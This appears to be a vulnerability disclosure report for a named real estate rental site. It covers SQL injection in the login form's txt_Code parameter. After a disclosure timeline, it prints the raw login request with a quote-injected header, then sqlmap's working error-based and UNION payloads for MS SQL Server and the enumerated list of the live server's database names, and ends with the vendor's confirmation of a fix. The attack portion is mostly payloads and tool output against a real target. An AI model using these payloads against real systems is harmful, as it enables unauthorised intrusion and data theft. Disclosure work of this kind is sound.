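2015-11-06: Details reported to the vendor; awaiting vendor response
2015-11-06: Vendor confirmed; details disclosed to the vendor only
2015-11-16: Details disclosed to core white hats and relevant domain experts
2015-11-26: Details disclosed to regular white hats
2015-12-06: Details disclosed to trainee white hats
2015-12-21: Details disclosed to the public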
2333
POST /Tentct/Login.aspx HTTP/1.1
Host: km.qk365.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://km.qk365.com/Tentct/Login.aspx
Cookie: Hm_lvt_53c8bf761df44282a0cf7d4949581592=1446710154; Hm_lpvt_53c8bf761df44282a0cf7d4949581592=1446710163; _ga=GA1.2.837828670.1446710155; LXB_REFER=www.wooyun.org; ASP.NET_SessionId=xz1yzy55pt5wpqizuh5k2k55
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 319

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b%2BrTX22oGpB3az%2BQ5MK&txt_Code=admin&txt_Password=123456&imageField.x=0&imageField.y=0&__EVENTVALIDATION=%2FwEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD%2F6wTuGPHEaKThJjkc8fmNFk3e%2BR
The txt_Code parameter is injectable.
POST parameter 'txt_Code' is vulnerable. Do you want to keep testing the others(if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 42 HTTP(s) requests:
---
Parameter: txt_Code (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b+rTX22oGpB3az+Q5MK&txt_Code=admin' AND 3112=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3112=3112) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(118)+CHAR(113))) AND 'yCuW'='yCuW&txt_Password=123456&imageField.x=0&imageField.y=0&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e+R

    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b+rTX22oGpB3az+Q5MK&txt_Code=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(82)+CHAR(80)+CHAR(67)+CHAR(104)+CHAR(81)+CHAR(89)+CHAR(110)+CHAR(81)+CHAR(108)+CHAR(109)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &txt_Password=123456&imageField.x=0&imageField.y=0&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e+R
---
[18:16:02] [INFO] testing Microsoft SQL Server
[18:16:03] [INFO] confirming Microsoft SQL Server
[18:16:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[18:16:04] [INFO] fetching database names
[18:16:04] [INFO] the SQL query used returns 28 entries
[18:16:04] [INFO] retrieved: 20141231
[18:16:05] [INFO] retrieved: master
[18:16:05] [INFO] retrieved: model
[18:16:05] [INFO] retrieved: msdb
[18:16:06] [INFO] retrieved: new_0430
[18:16:06] [INFO] retrieved: new_HouseRent_20141130
[18:16:06] [INFO] retrieved: new_HouseRent_20141130
[18:16:07] [INFO] retrieved: new_HouseRent_20141201
[18:16:07] [INFO] retrieved: new_HouseRent_20141228
[18:16:07] [INFO] retrieved: new_HouseRent_20150119
[18:16:07] [INFO] retrieved: new_HouseRent_20150120
[18:16:08] [INFO] retrieved: new_HouseRent_20150205
[18:16:08] [INFO] retrieved: new_HouseRent_20150301
[18:16:08] [INFO] retrieved: new_HouseRent_20150306
[18:16:10] [INFO] retrieved: new_HouseRent_20150325
[18:16:11] [INFO] retrieved: new_HouseRent_20150401
[18:16:11] [INFO] retrieved: new_HouseRent_20150405
[18:16:11] [INFO] retrieved: new_HouseRent_20150501_0
[18:16:11] [INFO] retrieved: new_HouseRent_20150605
[18:16:11] [INFO] retrieved: new_HouseRent_20150731
[18:16:12] [INFO] retrieved: new_HouseRent_20150930
[18:16:12] [INFO] retrieved: ReportServer
[18:16:12] [INFO] retrieved: ReportServerTempDB
[18:16:15] [INFO] retrieved: tempdb
[18:16:16] [INFO] retrieved: tmp_1018
[18:16:16] [INFO] retrieved: tmp_1019
[18:16:16] [INFO] retrieved: tmp_1020
[18:16:16] [INFO] retrieved: tmp_111
available databases [27]:
[*] 20141231
[*] master
[*] model
[*] msdb
[*] new_0430
[*] new_HouseRent_20141130
[*] new_HouseRent_20141201
[*] new_HouseRent_20141228
[*] new_HouseRent_20150119
[*] new_HouseRent_20150120
[*] new_HouseRent_20150205
[*] new_HouseRent_20150301
[*] new_HouseRent_20150306
[*] new_HouseRent_20150325
[*] new_HouseRent_20150401
[*] new_HouseRent_20150405
[*] new_HouseRent_20150501_0
[*] new_HouseRent_20150605
[*] new_HouseRent_20150731
[*] new_HouseRent_20150930
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] tmp_1018
[*] tmp_1019
[*] tmp_1020
[*] tmp_111

[18:16:17] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 52 times
[18:16:17] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\km.qk365.com'

[*] shutting down at 18:16:17
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-06 19:01
Thank you very much; an emergency fix has been arranged.
None yet